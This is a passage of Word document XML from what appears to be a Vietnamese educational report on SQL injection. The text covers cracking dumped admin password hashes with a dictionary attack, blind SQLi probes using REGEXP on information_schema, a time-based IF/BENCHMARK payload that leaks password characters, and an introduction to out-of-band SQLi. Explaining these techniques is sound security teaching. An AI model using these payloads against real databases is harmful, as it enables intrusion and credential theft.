        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00676D4D">
        <w:tab/>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidR="004F6319">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00676D4D">
        <w:t>-a 0 ứng với dạng tấn công từ điển</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2C0E6D" w14:textId="209A304B" w:rsidR="00676D4D" w:rsidRPr="00676D4D" w:rsidRDefault="00676D4D" w:rsidP="004F6319">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00676D4D">
        <w:tab/>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidR="004F6319">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00676D4D">
        <w:t>hash.txt ứng với file chứa hashCode cần crack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3832521A" w14:textId="3FACA2DC" w:rsidR="00676D4D" w:rsidRPr="00676D4D" w:rsidRDefault="00676D4D" w:rsidP="004F6319">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00676D4D">
        <w:tab/>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidR="004F6319">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00676D4D">
        <w:t>wordlist.txt chứa tập dữ liệu mật khẩu ở dạng plaintext</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D847580" w14:textId="77777777" w:rsidR="00676D4D" w:rsidRPr="00676D4D" w:rsidRDefault="00676D4D" w:rsidP="004F6319">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00676D4D">
        <w:t>Quá trình này kéo dài một vài phút sẽ cho ra kết quả</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9CA955" w14:textId="77777777" w:rsidR="00676D4D" w:rsidRPr="00676D4D" w:rsidRDefault="00676D4D" w:rsidP="004F6319">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E190934" w14:textId="77777777" w:rsidR="00676D4D" w:rsidRPr="00676D4D" w:rsidRDefault="00676D4D" w:rsidP="004F6319">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00676D4D">
        <w:t>Khi đã biết được user,password của admin(ứng với hàng đầu tiên hoặc các hàng tiếp theo trong bảng user) thì ta đã có được quyền truy cập vào admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22857D9B" w14:textId="77777777" w:rsidR="00676D4D" w:rsidRPr="00FC5CBE" w:rsidRDefault="00676D4D" w:rsidP="00676D4D">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7118986B" w14:textId="77777777" w:rsidR="00FC5CBE" w:rsidRDefault="00FC5CBE"/>
    <w:p w14:paraId="562111C6" w14:textId="4DB3B803" w:rsidR="00D57663" w:rsidRDefault="00D57663"/>
    <w:p w14:paraId="02A73831" w14:textId="64234EE5" w:rsidR="00D57663" w:rsidRDefault="00D57663"/>
    <w:p w14:paraId="39968FA5" w14:textId="60117F5C" w:rsidR="00D57663" w:rsidRDefault="00D57663"/>
    <w:p w14:paraId="1A4FE522" w14:textId="270F3F19" w:rsidR="00D57663" w:rsidRDefault="004F6319">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30CF583D" wp14:editId="0E4C7ACA">
            <wp:extent cx="5730240" cy="3627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627120"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9388F3" w14:textId="68F9A991" w:rsidR="001D0AEE" w:rsidRDefault="001D0AEE"/>
    <w:p w14:paraId="4CEB10F8" w14:textId="70F6C625" w:rsidR="001D0AEE" w:rsidRDefault="001D0AEE"/>
    <w:p w14:paraId="25AE2866" w14:textId="29EF3404" w:rsidR="0034245F" w:rsidRPr="0034245F" w:rsidRDefault="0034245F" w:rsidP="0034245F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="0034245F">
        <w:t>Trên là ảnh mô tả quá trình xâm nhập bằng SQLi, khi ta có được dữ liệu Admin Login, ta có thể đi xa hơn bằng việc pass qua lớp bảo mật của server để có được quyền cao nhất, với quyền cao nhất ta có thể lấy dữ liệu người dùng, chỉnh sửa cấu trúc của cơ sở dữ liệu. Để có thể qua được tầng này có thể kết hợp với các công cụ, phương pháp khác,...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25509132" w14:textId="77777777" w:rsidR="0034245F" w:rsidRPr="0034245F" w:rsidRDefault="0034245F" w:rsidP="0034245F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EDEF139" w14:textId="3F5DAA26" w:rsidR="0034245F" w:rsidRPr="0034245F" w:rsidRDefault="0034245F" w:rsidP="0034245F">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="0034245F">
        <w:t>Để tối ưu quá trình tìm kiếm hacker có thể dùng kỹ thuật tấn công Regular Expression </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D8EB2D" w14:textId="075554C4" w:rsidR="0034245F" w:rsidRDefault="0034245F" w:rsidP="0034245F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0034245F">
        <w:t xml:space="preserve">Ex : </w:t>
      </w:r>
      <w:r w:rsidRPr="0034245F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">1 = </w:t>
      </w:r>
      <w:r w:rsidRPr="0034245F">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0034245F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="0034245F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t>ELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^[a-n]' LIMIT 0,1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA19853" w14:textId="77777777" w:rsidR="0034245F" w:rsidRPr="0034245F" w:rsidRDefault="0034245F" w:rsidP="0034245F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41C30486" w14:textId="18A0B46A" w:rsidR="0034245F" w:rsidRPr="0034245F" w:rsidRDefault="0034245F" w:rsidP="0034245F">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    Ở</w:t>
      </w:r>
      <w:r w:rsidRPr="0034245F">
        <w:t xml:space="preserve"> ví dụ trên ta đang xét liệu dữ liệu hàng đầu tiên table_name chỉ chứa các ký tự từ a-n hay không, việc dùng Regex sẽ khiến cho quá trình kiểm tra nhanh hơn, dễ dàng hơn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461C614B" w14:textId="49CD4ACB" w:rsidR="001D0AEE" w:rsidRDefault="001D0AEE"/>
    <w:p w14:paraId="63BB31B3" w14:textId="1F6E85B5" w:rsidR="001D0AEE" w:rsidRDefault="001D0AEE"/>
    <w:p w14:paraId="6E0C36E2" w14:textId="65A27CE7" w:rsidR="001D0AEE" w:rsidRDefault="001D0AEE"/>
    <w:p w14:paraId="259E8D0D" w14:textId="47E2D48C" w:rsidR="001D0AEE" w:rsidRDefault="00DA3AE3" w:rsidP="00DA3AE3">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:bookmarkStart w:id="20" w:name="_Toc42895609"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.Time-Based</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="1C750506" w14:textId="212F67AB" w:rsidR="009E3686" w:rsidRDefault="00DA3AE3" w:rsidP="00432B73">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">     Ở dạng này, hacker thường dùng kết hợp các câu lệnh điều kiện với các lệnh yêu cầu hệ thống phản hồi sau 1 khoảng thời gian nhất định.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7BD5D0" w14:textId="77777777" w:rsidR="00DA3AE3" w:rsidRDefault="00DA3AE3" w:rsidP="00432B73">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>Select IF(expression, action)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC65385" w14:textId="77777777" w:rsidR="00DA3AE3" w:rsidRDefault="00DA3AE3" w:rsidP="00432B73">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>Waitfor Delay(‘time’) dùng cho MS SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAEFD14" w14:textId="0EE6E248" w:rsidR="009E3686" w:rsidRDefault="00DA3AE3" w:rsidP="00432B73">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>Benchmark(number, action) dùng để thực hiện action ứng với giá trị của number dùng trong MySQL: Ta xét lệnh sau: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A83AB7D" w14:textId="77777777" w:rsidR="00432B73" w:rsidRDefault="00432B73" w:rsidP="00432B73">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EBDC24D" w14:textId="332FE7B8" w:rsidR="00DA3AE3" w:rsidRPr="00432B73" w:rsidRDefault="00DA3AE3" w:rsidP="00432B73">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00432B73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Select </w:t>
      </w:r>
      <w:r w:rsidRPr="00432B73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="93C763"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidRPr="00432B73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">(substring(user_password,1,1)) = </w:t>
      </w:r>
      <w:r w:rsidRPr="00432B73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="93C763"/>
        </w:rPr>
        <w:t>char</w:t>
      </w:r>
      <w:r w:rsidRPr="00432B73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(50), BenchMark(5000000, ENCODE(</w:t>
      </w:r>
      <w:r w:rsidRPr="00432B73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="DEAA76"/>
        </w:rPr>
        <w:t>'MSG'</w:t>
      </w:r>
      <w:r w:rsidRPr="00432B73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00432B73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="DEAA76"/>
        </w:rPr>
        <w:t>'by 5 seconds'</w:t>
      </w:r>
      <w:r w:rsidRPr="00432B73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">)), </w:t>
      </w:r>
      <w:r w:rsidRPr="00432B73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="93C763"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00432B73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>) from users where user_id =1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD956A2" w14:textId="5FDD680E" w:rsidR="009E3686" w:rsidRDefault="009E3686" w:rsidP="00DA3AE3">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E905A5C" w14:textId="2E6B8FA6" w:rsidR="009E3686" w:rsidRDefault="009E3686" w:rsidP="00432B73">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:t>Ta xét ký tự đầu tiên trong password, nếu giá trị này ứng với char(50) thì sẽ gọi lệnh Benchmark để trì hoãn một khoảng thời gian trước khi hệ thống phản hồi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E73783" w14:textId="13CBC9E4" w:rsidR="009E3686" w:rsidRDefault="009E3686" w:rsidP="00432B73">
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidR="00432B73">
        <w:tab/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Hệ thống có thể phản hồi không ổn định dẫn đến sai lệch về thời gian trả về, nhưng quan trọng hơn hết, việc xác định tham số lần lặp trong hàm benchmark sẽ tác động tới thời gian phản hồi của hệ thống một cách đáng kể.(cần chọn hợp lý để tránh lỗi Timeout).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B49905B" w14:textId="3AF72511" w:rsidR="009E3686" w:rsidRDefault="00432B73" w:rsidP="00432B73">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidR="009E3686">
        <w:t>Time-based có thể được sử dụng độc lập hoặc là một giải pháp thay thế cho Content-based.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3655BDC4" w14:textId="125DD1B6" w:rsidR="00432B73" w:rsidRDefault="00432B73" w:rsidP="00432B73">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BC41748" w14:textId="0E11311D" w:rsidR="00432B73" w:rsidRPr="00315DFF" w:rsidRDefault="00315DFF" w:rsidP="00315DFF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc42895610"/>
      <w:r w:rsidRPr="00315DFF">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.2.4</w:t>
      </w:r>
      <w:r w:rsidR="00432B73" w:rsidRPr="00315DFF">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>, Ưu điểm và nhược điểm</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="1CBDDC88" w14:textId="77777777" w:rsidR="00432B73" w:rsidRPr="00432B73" w:rsidRDefault="00432B73" w:rsidP="00432B73">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08275150" w14:textId="30A4F6C8" w:rsidR="00432B73" w:rsidRPr="00432B73" w:rsidRDefault="00B82E17" w:rsidP="00B82E17">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidR="00432B73" w:rsidRPr="00B82E17">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ưu điểm</w:t>
      </w:r>
      <w:r w:rsidR="00432B73" w:rsidRPr="00432B73">
        <w:t>: + Độ nguy hiểm tương đương với các phương pháp SQLi #Có thể sử dụng nếu phương pháp Error-based không hoạt động    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C224801" w14:textId="77777777" w:rsidR="00B82E17" w:rsidRDefault="00B82E17" w:rsidP="00B82E17">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidR="00432B73" w:rsidRPr="00B82E17">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Nhược điểm</w:t>
      </w:r>
      <w:r w:rsidR="00432B73" w:rsidRPr="00432B73">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67671824" w14:textId="504106C4" w:rsidR="00432B73" w:rsidRPr="00432B73" w:rsidRDefault="00432B73" w:rsidP="00B82E17">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00432B73">
        <w:t>+Quá trình này tốn rất nhiều thời gian vì phải lặp lại các lệnh</w:t>
      </w:r>
      <w:r w:rsidR="00B82E17">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00432B73">
        <w:t>TRUE/FALSE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7916121D" w14:textId="77777777" w:rsidR="00432B73" w:rsidRPr="00432B73" w:rsidRDefault="00432B73" w:rsidP="00B82E17">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00432B73">
        <w:t>+Khó để kiểm soát vì đòi hỏi hacker phải liệt kê được tất cả các khả năng cần thiết</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC1D819" w14:textId="77777777" w:rsidR="00432B73" w:rsidRPr="00432B73" w:rsidRDefault="00432B73" w:rsidP="00B82E17">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00432B73">
        <w:br/>
        <w:t>Nhưng có thể tối ưu được thời gian bằng cách sử dụng  các công cụ khai thác tự động như SQLMap,SQLninja,... </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8C10C5" w14:textId="418F1C7E" w:rsidR="00432B73" w:rsidRDefault="00432B73" w:rsidP="00B82E17">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A44D70E" w14:textId="2DFB004A" w:rsidR="00B82E17" w:rsidRDefault="00B82E17" w:rsidP="00B82E17">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1146E64F" w14:textId="67FE2CDA" w:rsidR="00B82E17" w:rsidRDefault="00B82E17" w:rsidP="00B82E17">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3442EDDD" w14:textId="77777777" w:rsidR="00432B73" w:rsidRDefault="00432B73" w:rsidP="00CB4653"/>
    <w:p w14:paraId="4BEDCDCE" w14:textId="4033BEF6" w:rsidR="009E3686" w:rsidRDefault="009E3686" w:rsidP="00DA3AE3">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6400D71F" w14:textId="67C40608" w:rsidR="00DA3AE3" w:rsidRDefault="00612EC6" w:rsidP="00612EC6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc42895611"/>
      <w:r w:rsidRPr="00612EC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.3.Out Of Band</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="66284D2D" w14:textId="0EAA2254" w:rsidR="00612EC6" w:rsidRDefault="00612EC6" w:rsidP="00912760">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:bookmarkStart w:id="23" w:name="_Toc42895612"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.3.1.Giới thiệu</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="37CBF08A" w14:textId="673E33FE" w:rsidR="00612EC6" w:rsidRDefault="00612EC6" w:rsidP="00912760">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00912760">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:t>So với In-Band và Blind SQL Injection, OOB SQL injection sẽ lọc dữ liệu thông qua kênh bên ngoài, có thể là giao thức DNS hoặc HTTP. Cơ chế này hoạt động cần phải dựa vào các hàm có sẵn, có thể là các hàm hoạt động với file (load_file(), master..xp_dirtree) hoặc hàm tạo kết nối (DBMS_LDAP.INIT, UTL_HTTP.request).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF39887" w14:textId="2645BBF9" w:rsidR="00612EC6" w:rsidRDefault="00912760" w:rsidP="00612EC6">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4913FA" w14:textId="5A9C02FF" w:rsidR="001E56C2" w:rsidRPr="001E56C2" w:rsidRDefault="001E56C2" w:rsidP="001E56C2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:bookmarkStart w:id="24" w:name="_Toc42895613"/>
      <w:r w:rsidRPr="001E56C2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.3.2. Cơ chế hoạt động</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="4B570B74" w14:textId="108B3F0E" w:rsidR="001874B6" w:rsidRDefault="001874B6" w:rsidP="001874B6">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   Để khai thác OOB SQLI các máy chủ cơ sở dữ liệu và web phải đáp ứng được các điều kiện:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655F2E17" w14:textId="77777777" w:rsidR="001874B6" w:rsidRDefault="001874B6" w:rsidP="001874B6">
      <w:r>
        <w:t>1. Thiếu xác thực đầu vào trên ứng dụng web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F78171A" w14:textId="77777777" w:rsidR="001874B6" w:rsidRDefault="001874B6" w:rsidP="001874B6">
      <w:r>
        <w:t>2. Môi trường mạng cho phép máy chủ CSDL bắt đầu yêu cầu gửi đi (DNS, HTTP) thành công khai mà không hạn chế vành đai bảo mật.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1B05C2" w14:textId="7136EFBA" w:rsidR="001874B6" w:rsidRDefault="001874B6" w:rsidP="001874B6">
      <w:r>
        <w:t>3. Có quyền để thực thi các hàm cần thiết để bắt đầu yêu cầu gửi đi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6397A80E" w14:textId="4C171A18" w:rsidR="001874B6" w:rsidRDefault="001874B6" w:rsidP="001874B6"/>
    <w:p w14:paraId="2D50F1F9" w14:textId="155F9C7A" w:rsidR="001874B6" w:rsidRPr="001874B6" w:rsidRDefault="001874B6" w:rsidP="001874B6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001874B6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Minh họa luồng OOB SQLI:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B897A0" w14:textId="63ED050C" w:rsidR="001874B6" w:rsidRDefault="001874B6" w:rsidP="001874B6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="medium-content-serif-font;Georg" w:hAnsi="medium-content-serif-font;Georg"/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="medium-content-serif-font;Georg" w:hAnsi="medium-content-serif-font;Georg"/>
          <w:noProof/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="31CC80EB" wp14:editId="4CBC9E36">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>356870</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6120130" cy="3825240"/>
            <wp:effectExtent l="0" t="0" r="0" b="381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6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="3825240"/>
